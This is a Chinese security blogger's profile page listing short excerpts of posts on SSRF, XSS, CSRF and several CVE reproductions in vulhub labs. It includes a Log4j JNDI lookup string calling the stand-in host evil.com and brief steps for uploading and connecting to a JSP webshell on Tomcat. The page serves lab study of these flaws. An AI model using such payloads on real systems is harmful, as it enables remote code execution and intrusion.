自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(14)
  • 收藏
  • 关注

原创 SSRF漏洞原理与防御

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)

2023-11-03 23:57:47 171

原创 Ubuntu su: 认证失败

密码中可以包含特殊字符,如!问题:我们在输入su root命令时提示su: 认证失败。解决:只要使用passwd命令重新设置下root密码。原因:报这个错误的原因是root用户默认锁定的。密码中必须包含至少一个大写字母(A-Z)。密码中必须包含至少一个小写字母(a-z)。密码中必须包含至少一个数字(0-9)。输入命令: su passwd。密码长度至少为8个字符。

2023-10-29 16:43:42 608

原创 Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)漏洞复现

Spring Cloud Function是一个用于构建和部署基于函数的微服务的框架。它使用SpEL表达式来处理函数的输入和输出。SpEL是一种强大的表达式语言,它允许开发人员在运行时动态地计算表达式。由于Spring CloudFunction中RoutingFunction类的apply方法将请求头中的"spring.cloud.function.routing-expression"参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,当使用路由功能时,攻击者可利用该漏洞远程执行任意代码。

2023-10-27 22:55:25 326 1

原创 CSRF原理及防护

CSRF全称为跨站请求伪造(Cross-site request forgery),是一种网络攻击方式,也被称为 one-click attack 或者 session riding。

2023-10-23 16:54:18 307

原创 Log4j2 JNDI 注入漏洞(CVE-2021-44228)漏洞复现

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入,执行任意代码。Log4j是什么?JNDI又是什么?Log4j2是一个Java日志框架,用于在应用程序中记录和管理日志信息。Log4j2被广泛应用于Java项目中,帮助开发人员进行日志记录和故障排查。

2023-10-19 16:28:06 191

原创 XSS漏洞类型原理及防御方式

XSS全称是Cross Site Scripting即跨站脚本,为了与层叠样式表Cascading Style Sheets,CSS)的缩写进行区分,将跨站脚本攻击缩写为XSS,其本质是攻击者在web页面插入恶意的script代码(这个代码可以是JS脚本、CSS样式或者其他意料之外的代码),当用户浏览该页面之时,嵌入其中的script代码会被执行,从而达到恶意攻击用户的目的。

2023-10-15 01:06:40 755 1

原创 GitLab 任意文件读取漏洞(CVE-2016-9086)

访问"http://192.168.233.129:8080" 访问GitLab主页 默认管理员口令"root:vulhub123456"新建项目 输入项目名称 点击 GitLab export。启动一台kali机 192.168.233.129。上传test.tar.gz文件。在vulhub靶场启动环境。

2023-10-11 21:33:25 166

原创 google hacking 常见语法

例如,allintitle:密码 用户名将返回标题中同时包含"密码"和"用户名"的页面。例如,inanchor:"点击这里"将返回链接文本中包含"点击这里"的页面。这对于查找特定链接文本的页面非常有用。例如,cache:example.com将显示example.com的Google缓存页面。例如,link:example.com将返回链接到example.com的页面。例如,intitle:"登录页面"将返回标题包含"登录页面"的页面。例如,intext:"密码"将返回包含"密码"关键词的页面。

2023-09-25 11:20:18 147 1

原创 弱口令及字典

是指系统登录口令的设置强度不高,容易被攻击者猜到或破解密码,从而获取非法访问权限。

2023-09-07 19:58:36 485 1

原创 java的序列化和反序列化

对于 JVM 可以反序列化对象,它必须是能够找到字节码的类。Java对象是运行在JVM的堆内存中的,如果JVM停止后,那么java对象的生命也就终止了。当对象被序列化时,属性 SSN 的值为 111222333,但是因为该属性是短暂的,该值没有被发送到输出流。java中的序列化时transient变量(这个关键字的作用就是告知JAVA不可以被序列化)和静态变量不会被序列化。一旦实现了此接口,就标志该类的对象就是可序列化的。该类的所有属性必须是可序列化的。Java中的序列化是指将对象转换为字节流的过程。

2023-09-04 20:08:03 246

原创 tomcat8 后台getshell漏洞复现

打开哥斯拉 生成jsp木马并保存。在url栏加上jmuma.jsp。找到刚刚jsp木马存放的位置。此时复制连接,用哥斯拉连接。将zip后缀改为war。在此位置上传war包。

2023-09-03 20:14:30 258

原创 Redis Lua沙盒绕过命令执行(CVE-2022-0543)

不同环境下的liblua库路径不同,我们需要指定一个正确的路径。而在Vulhub环境(Ubuntu fiocal)中,这个路径是。,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象。环境启动后,我们到另一台kail机连接redis。连接成功之后使用使用。

2023-09-02 20:56:44 195

原创 ThinkPHP5 5.0.23 远程代码执行漏洞复现

是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。至此 ThinkPHP5 5.0.23 远程代码执行漏洞 复现成功。id是我们执行的命令,可更换我们需要的命令。5.0.23和5.1.31之前的所有版本。改变传参方式 GET改为POST。访问靶机ip+端口号8080。使用burp抓到首页的包。

2023-09-01 16:28:04 433

原创 vulhub struts2 s2-001漏洞复现

该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。执行任意命令执行的是new java.lang.String[]{"pwd"}中的pwd命令,我们只需将pwd命令替换成我们想要的命令即可。可以看到环境启动成功。

2023-09-01 10:02:30 301

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除